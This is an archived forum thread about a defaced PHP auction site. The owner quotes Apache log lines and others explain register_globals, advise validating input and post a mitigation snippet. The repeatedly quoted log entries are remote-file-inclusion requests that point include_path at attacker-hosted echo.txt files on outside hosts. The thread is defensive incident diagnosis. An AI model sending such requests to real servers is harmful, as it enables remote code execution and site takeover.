Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and lots
of entries where an "include_pa th" parameter was included in the URL of the
PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow. inc.php?include _path=http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_pa th" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a code
404 as the culprits are obviously phising for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.
Can someone explain what adding "include_pa th" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
9  2409 
Charles Crume wrote:
Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and lots
of entries where an "include_pa th" parameter was included in the URL of the
PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow. inc.php?include _path=http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_pa th" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a code
404 as the culprits are obviously phising for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.
Can someone explain what adding "include_pa th" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
The include_path itself in the url is just a variable. It's what you do
with it that's important. For instance, if you have register_global s
enabled, the include_path in the URL may override the system include_path.
Or, depending on what else you do in your code. This is a big reason
why it's good to use $_POST instead of $_REQUEST if you're posting a
form to a page - $_POST will ignore any $_GET parameters.
And just another reason to *ALWAYS* validate data coming from the user.
--
=============== ===
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp. js*******@attgl obal.net
=============== ===
Hi Jerry;
Thanks!!!
I am using an auction software package the *requires* register_global s to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).
I have turned register_global s off (of course the auction software no longer
works) until I figure out what to do.
Thanks again for your help!
Charles...
"Jerry Stuckle" <js*******@attg lobal.netwrote in message
news:D7******** *************** *******@comcast .com...
Charles Crume wrote:
>Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and
lots of entries where an "include_pa th" parameter was included in the URL
of the PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow. inc.php?include _path=http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149. 61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_pa th" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a
code 404 as the culprits are obviously phising for pages, but requests
with return code 200 are showing a large number of bytes transferred --
far larger than the PHP page itself.
Can someone explain what adding "include_pa th" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
The include_path itself in the url is just a variable. It's what you do
with it that's important. For instance, if you have register_global s
enabled, the include_path in the URL may override the system include_path.
Or, depending on what else you do in your code. This is a big reason why
it's good to use $_POST instead of $_REQUEST if you're posting a form to a
page - $_POST will ignore any $_GET parameters.
And just another reason to *ALWAYS* validate data coming from the user.
--
=============== ===
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
js*******@attgl obal.net
=============== ===
Charles Crume wrote:
Hi Jerry;
Thanks!!!
I am using an auction software package the *requires* register_global s to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).
I have turned register_global s off (of course the auction software no longer
works) until I figure out what to do.
Thanks again for your help!
Charles...
"Jerry Stuckle" <js*******@attg lobal.netwrote in message
news:D7******** *************** *******@comcast .com...
>Charles Crume wrote:
>>Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and
lots of entries where an "include_pa th" parameter was included in the URL
of the PHP page, as shown below:
69.94.36.15 5 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow. inc.php?include _path=http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.15 5 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.15 5 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.6 1 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.6 1 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.6 1 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.6 1 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.6 1 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.6 1 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.6 1 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_pa th" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a
code 404 as the culprits are obviously phising for pages, but requests
with return code 200 are showing a large number of bytes transferred --
far larger than the PHP page itself.
Can someone explain what adding "include_pa th" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
The include_path itself in the url is just a variable. It's what you do
with it that's important. For instance, if you have register_global s
enabled, the include_path in the URL may override the system include_path.
Or, depending on what else you do in your code. This is a big reason why
it's good to use $_POST instead of $_REQUEST if you're posting a form to a
page - $_POST will ignore any $_GET parameters.
And just another reason to *ALWAYS* validate data coming from the user.
--
============== ====
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
js*******@attgl obal.net
============== ====
If your software is so old that it requires register_global s, it
probably has other security holes, also.
If they don't have an upgraded version, I'd suggest you find another
package. Otherwise, chances are you'll have this happen again.
Especially since they now know you're vulnerable.
--
=============== ===
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp. js*******@attgl obal.net
=============== ===
Charles Crume wrote:
Hi Jerry;
Thanks!!!
I am using an auction software package the *requires* register_global s to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).
I have turned register_global s off (of course the auction software no longer
works) until I figure out what to do.
Thanks again for your help!
Charles...
And I forgot - please don't top post. Thanks.
--
=============== ===
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp. js*******@attgl obal.net
=============== ===
On Oct 14, 9:56 pm, "Charles Crume"
<NOccsS...@char lescrumesoftwar e.comwrote:
Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and lots
of entries where an "include_pa th" parameter was included in the URL of the
PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow. inc.php?include _path=http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_pa th" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a code
404 as the culprits are obviously phising for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.
Can someone explain what adding "include_pa th" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
Hi,
I've been the target also of a hacker, with the same attack.
Add this to you script:
=====
$php_self = $_SERVER['PHP_SELF'];
if (($php_self == "/auction/includes/settings.inc.ph p") &&
(ini_get(regist er_globals))) {
$rg = array_keys($_RE QUEST);
foreach($rg as $var)
{
if ($_REQUEST[$var] === $$var)
{
unset($$var);
exit;
}
}
}
=======
This will check if they are running the file, if register_global s is
enabled catch the parameters and unset them then halt the script.
So far it is working.
Jean
..oO(Charles Crume)
>I am using an auction software package the *requires* register_global s to be
enabled.
You shouldn't use it anymore and look for a better script, that doesn't
rely on insecure and deprecated features. register_global s is history
and will be completely dropped with PHP 6.
Micha
Hi Jean;
This has to be added to every script, correct? (If so, it would be too much
work and I would be better off to purchase newer auction software.)
I am also looking at use mod_rewrite in Apache to redirect any request with
"include_pa th" in it to a null page. Does anyone have thoughts on this
approach?
TIA.
Charles...
"Jean Gaudreau" <je***********@ gmail.comwrote in message
news:11******** **************@ i13g2000prf.goo glegroups.com.. .
On Oct 14, 9:56 pm, "Charles Crume"
<NOccsS...@char lescrumesoftwar e.comwrote:
>Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and
lots
of entries where an "include_pa th" parameter was included in the URL of
the
PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow. inc.php?include _path=http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.ph p?include_path= http://www.usiauctions .biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149. 61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?inclu de_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149. 61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php ?include_path=h ttp://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_pa th" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a
code
404 as the culprits are obviously phising for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.
Can someone explain what adding "include_pa th" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
Hi,
I've been the target also of a hacker, with the same attack.
Add this to you script:
=====
$php_self = $_SERVER['PHP_SELF'];
if (($php_self == "/auction/includes/settings.inc.ph p") &&
(ini_get(regist er_globals))) {
$rg = array_keys($_RE QUEST);
foreach($rg as $var)
{
if ($_REQUEST[$var] === $$var)
{
unset($$var);
exit;
}
}
}
=======
This will check if they are running the file, if register_global s is
enabled catch the parameters and unset them then halt the script.
So far it is working.
Jean
I know... however this is easier said than done. Lot's of work to re-enter
customer info, sales info, items, etc.
Hopefully I will find another solution.
Thanks.
Charles...
"Michael Fesser" <ne*****@gmx.de wrote in message
news:c6******** *************** *********@4ax.c om...
.oO(Charles Crume)
>>I am using an auction software package the *requires* register_global s to
be
enabled.
You shouldn't use it anymore and look for a better script, that doesn't
rely on insecure and deprecated features. register_global s is history
and will be completely dropped with PHP 6.
Micha
"Gary L. Burnore" <gb******@datab asix.comwrote in message
news:ff******** **@blackhelicop ter.databasix.c om...
On Wed, 17 Oct 2007 19:23:17 -0400, "Charles Crume"
<NO*******@char lescrumesoftwar e.comwrote:
>>I know... however this is easier said than done. Lot's of work to re-enter
customer info, sales info, items, etc.
Hopefully I will find another solution.
Thanks.
Charles...
What's with the recent rash of top posters?
Google noticed the activity in this group doubled - although, it's mostly
spam. This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics | |
by: Ziggi |
last post by:
Hi !
I have an ISAPI instalation of PHP over IIS5 server
on Windows 2000. Everything works fine but as I am
under website development I would like to keep
PHP error messages turned on - for my development
purpose. Unfortunately, that concludes that in case
somebody types a fake address like: http://www.myurl/xyz.php
the server replies with something like that:
|
by: steve |
last post by:
I am quite frustrated with php’s include, as I have spent a ton of
time on it already... anyone can tell me why it was designed like this
(or something I don’t get)?
The path in include is relative NOT to the immediate script that is
including it, but is relative to the top-level calling script.
In practice, this means that you have to constantly worry and adjust
paths in includes, based on the startup scripts that call these...
|
by: Mxsmanic |
last post by:
The require() I'm using in a PHP script has stopped working after I
moved from PHP4 and Apache 1.3.x to PHP5 and Apache 2.x. Now I get
messages like this:
Warning: main(/includes/ReloadScript.html) : failed to
open stream: No such file or directory in
/usr/local/www/htdocs/main/AOLCompression.php on line 14
Fatal error: main() : Failed opening required
'/includes/ReloadScript.html' (include_path='.:/usr/local/lib/php') in
|
by: Brandons of mass destruction |
last post by:
I recently reconfigured open_basedir so that it wasn't quite so limited.
Now, I'm getting erros with php script that use to run fine, and I can't
figure out what went wrong.
Previously, open_basedir was configured (locally) like so:
/home/httpd/vhosts/mydomain.com/httpdocs/:tmp/
I changed it to
/home/httpd/vhosts/
|
by: Jim Carlock |
last post by:
I've set up the following using an Alias in Apache...
Alias /phpdocs/ "C:/Apache/htdocs/common/docs/php/"
<Directory "C:/Apache/htdocs/common/docs/php">
Options Indexes FollowSymlinks MultiViews
AllowOverride None
Order allow,deny
Allow from all
</Directory>
| | |
by: s2s Paris |
last post by:
<<"failed to open stream no such directory or file>>
Avez vous trouve ? J'ai le meme genre de probleme en essayant
d'installer en local avec SuSE 10 apache2 php4 , il me semble qu'il
manque un package mais lequel ?
Le problème vient probablement de la variable include_path du fichier
/etc/php.ini qui est mal configurée.
|
by: laredotornado |
last post by:
Hi,
I'm using PHP 4.4.4 on Apache 2 on Fedora Core 5. PHP was installed
using Apache's apxs and the php library was installed to
/usr/local/php. However, when I set my "error_reporting" setting to be
"E_ALL", notices are still not getting reported. The perms on my file
are 664, with owner root and group root. The php.ini file is located
at /usr/local/lib/php/php.ini. Any ideas why the setting does not seem
to be having an effect? ...
|
by: Paul |
last post by:
I am taking over an existing app and having trouble understanding their
references.
They have encapsulated Pear packages in the directory structure like:
/site
/site/html/Pear.php
/site/html/Sigma.php
/site/html/Common.php
/site/html/Quickform.php
/site/html/Quickform/
|
by: mejpark |
last post by:
Good afternoon PHPers,
This morning I downloaded "PHP Users" from sourceforge to implement a
user registration system. I followed the instructions in INSTALL.txt,
and successfully configured MySQL and set up an Apache Alias. Eclipse
reported several errors and warnings for scripts inside the "PHP
Users" directory.
These errors were caused by incorrect paths inside the include,
require-once and require statements. I changed all of...
|
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed.
This is as boiled down as I can make it.
Here is my compilation command:
g++-12 -std=c++20 -Wnarrowing bit_field.cpp
Here is the code in...
|
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth.
The Art of Business Website Design
Your website is...
| | |
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...
|
by: tracyyun |
last post by:
Dear forum friends,
With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the choice of these technologies. I'm particularly interested in Zigbee because I've heard it does some...
|
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing, and deployment—without human intervention. Imagine an AI that can take a project description, break it down, write the code, debug it, and then launch it, all on its own....
Now, this would greatly impact the work of software developers. The idea...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome a new presenter, Adolph Dupré who will be discussing some powerful techniques for using class modules.
He will explain when you may want to use classes instead of User Defined Types (UDT). For example, to manage the data in unbound forms.
Adolph will...
|
by: TSSRALBI |
last post by:
Hello
I'm a network technician in training and I need your help.
I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs.
The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols.
I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...
|
by: muto222 |
last post by:
How can i add a mobile payment intergratation into php mysql website.
| | |
by: bsmnconsultancy |
last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...
| |
